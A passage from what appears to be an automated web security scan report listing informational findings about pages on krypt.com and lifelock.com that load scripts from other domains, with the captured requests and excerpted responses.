Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:19 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:20 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 29858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="/sites/all/themes/infusion/css/elements.css?0" />
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

24.243. http://www.krypt.com/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /contact/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:02 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 27890

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Contact
...[SNIP]...
<!-- Start Javascript -->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.244. http://www.krypt.com/solutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /solutions/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solutions/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:03 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 20343

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Solution
...[SNIP]...
<!-- Start Javascript -->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.245. http://www.krypt.com/why-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /why-us/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:04 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 22985

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - The Kryp
...[SNIP]...
<!-- Start Javascript -->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.246. http://www.krypt.com/why-us/datacenters/lax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/datacenters/lax/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /why-us/datacenters/lax/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.6.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:31 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:36 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 25090

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Datacent
...[SNIP]...
<!-- Start Javascript -->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
<![endif]-->

   
   <script src="http://maps.google.com/maps/api/js?sensor=false" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.247. http://www.krypt.com/why-us/network/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/network/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /why-us/network/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.6.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:41:08 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:41:15 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 24420

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Network
...[SNIP]...
<!-- Start Javascript -->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.248. http://www.lifelock.com/about/leadership/management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/leadership/management/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/leadership/management/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.3.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/36

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:40 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18319

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script>
...[SNIP]...

24.249. http://www.lifelock.com/about/lifelock-in-the-community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/lifelock-in-the-community/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/lifelock-in-the-community/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=3e9d64599ec3dc11eab7f4125fe101c63ec073d706939dfc4db392a6; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.2.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/2/9

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:29 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15989

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script>
...[SNIP]...

24.250. http://www.lifelock.com/guarantee/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /guarantee/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /guarantee/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.6.10.1303613800; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/54

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:54 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13369

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script>
...[SNIP]...

24.251. http://www.lifelock.com/how-it-works/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /how-it-works/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-it-works/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:45 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 12670

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script>
...[SNIP]...

24.252. http://www.lifelock.com/identity-theft/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /identity-theft/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /identity-theft/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:46 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 32685

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script>
...[SNIP]...

24.253. http://www.lifelock.com/offers/faces/female/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /offers/faces/female/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBj